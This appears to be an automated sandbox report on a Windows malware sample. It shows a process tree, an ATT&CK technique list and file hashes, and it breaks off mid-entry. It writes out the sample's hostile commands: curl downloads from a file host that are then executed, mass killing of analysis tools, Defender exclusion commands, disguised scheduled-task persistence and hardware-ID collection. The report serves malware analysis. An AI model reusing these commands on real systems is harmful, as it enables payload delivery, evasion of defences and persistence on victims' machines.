- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:1860
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2764
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1220
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:384
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2420
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:3372
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4732
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:952
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2124
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3276
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1932
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1068
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4128
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1316
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:2592
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2648
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3656
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:4812
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4552
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1060
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:4296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:1884
    - - C:\Medal\Medal.exe
        
        "C:\Medal/Medal.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        
        PID:3460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Desktop\WmiPrvSE.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\TextInputHost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Recent\Registry.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3600
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\dllhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4056
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender Advanced Threat Protection\en-US\cmd.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Medal\Medal.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4528
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7Vz2dhDt3a.bat"
        6⤵
        
        PID:3276
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2920
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:3280
        
        C:\Users\Admin\Downloads\TextInputHost.exe
        
        "C:\Users\Admin\Downloads\TextInputHost.exe"
        7⤵
        Executes dropped EXE
        
        PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic diskdrive get model, serialnumber
  2⤵
  PID:1908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get model, serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get serialnumber
  2⤵
  PID:1568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get serialnumber
    3⤵
    PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
  2⤵
  PID:4764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get serialnumber
    3⤵
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
  2⤵
  PID:100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:4804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic path win32_computersystemproduct get uuid
  2⤵
  PID:1280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c getmac
  2⤵
  PID:4060
- - C:\Windows\system32\getmac.exe
    getmac
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause>nul
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4756
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:784
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1320
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2216
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2204
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:5056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5084
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 1144
    3⤵
    - Program crash
    PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:744
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4720
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:4912
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4604
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3808
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:900
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:3460
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:4764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:3460
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2920
    - - C:\Medal\Medal.exe
        
        "C:\Medal/Medal.exe"
        5⤵
        Executes dropped EXE
        
        PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4084
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2480
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2592
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:3200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2180
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4532
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:4484
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:5084
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3716
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3200
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1124
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1924
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2636
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3280
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:752
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1880
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3480 -ip 3480
1⤵
PID:4084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Desktop\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Desktop\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Desktop\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Downloads\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Downloads\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Recent\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default\Recent\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Recent\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-US\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-US\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5056 -ip 5056
1⤵
PID:4632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-US\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 10 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe

Filesize
206B

MD5
4f3f273179a1bd058ed059d322db85fc

SHA1
7eb81ffc4a93e30c4a2733d59acf7870df2103f6

SHA256
5b59e046d311d49f2f4ac613e394b0e3b4a925a6918ed8a9a9420929d2eed70d

SHA512
49a6fe66b7d9df496f57d5d2e66752141e5227072df13b3d3655be982e6a499607e276bf9f27bb16164309166f8116c0cd0481dcd5d8a05fb0ff1cde9c06299d

Download Submit
C:\Medal\Medal.exe

Filesize
1.6MB

MD5
397270342ebff19bad2535390cff49c6

SHA1
482edca85dc4a788acfaf1d1155f95c0e4f5e1f1

SHA256
143e3baeafa9d95f8261d342a8d74fceb1006c92fdabb8642d730ede7429bdaa

SHA512
6492376f333de41d0d7e8a21d32f8d0a10d2f9827948a9fe4fe04ee5bd6b10d3a2bd984c74201c3bfc8bf41347aaf0dc4b2b86dbeff4bfa8e65f7a03e7c9a9ba

Download Submit
C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat

Filesize
76B

MD5
913226ebe160f705613c1d6dc13763ca

SHA1
11519fe4f2769114270377bebe1d944073c68ae9

SHA256
